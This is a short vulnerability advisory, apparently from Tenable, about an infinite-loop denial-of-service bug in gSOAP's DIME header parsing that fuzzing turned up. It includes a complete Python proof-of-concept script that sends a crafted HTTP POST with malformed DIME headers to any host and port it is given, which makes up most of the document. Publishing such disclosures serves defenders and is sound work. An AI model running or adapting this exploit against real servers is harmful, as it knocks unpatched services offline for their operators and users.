[R1] gSOAP HTTP DIME Parsing Denial of Service

While investigating Devil's Ivy, Tenable decided to set aside some time to fuzz gSOAP using american fuzzy lop. Tenable discovered that gSOAP is surprisingly resilient!

But no one is perfect. We uncovered an infinite loop in the HTTP server's DIME header parsing. DIME doesn't appear to be widely used across gSOAP deployments, but, when enabled, a remote unauthenticated user can force the HTTP server to become unresponsive. We wrote a proof of concept against gSOAP's sample dimeserver application.

import sys
import socket

if len(sys.argv) != 3:
    print 'Usage: ./dime_poc.py  '
    sys.exit(0)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
server_address = (sys.argv[1], int(sys.argv[2]))
sock.connect(server_address)

payload = '<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns="urn:dime"><SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><ns:getImage><name>image.jpg</name></ns:getImage></SOAP-ENV:Body></SOAP-ENV:Envelope>'
payload_length = bytearray.fromhex("{:08x}".format(len(payload)))

iloop = ('POST /~engelen/dimesrv.cgi HTTP/1.1\r\n'
'Host: test\r\n'
'User-Agent: gSOAP/2.8\r\n'
'Content-Type: application/dime\r\n'
'Connection: close\r\n'
'\r\n')
#start dime header
iloop += '\x0d\x3f\x00\x00\x00\x00\x00\x00'
iloop += payload_length
#end dime header
iloop += payload
#start new dime header
iloop += '\x0d\x3f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x7f\xff\x2f\x3e'
# lawl
sock.sendall(iloop)

print sock.recv(4096)

sock.close()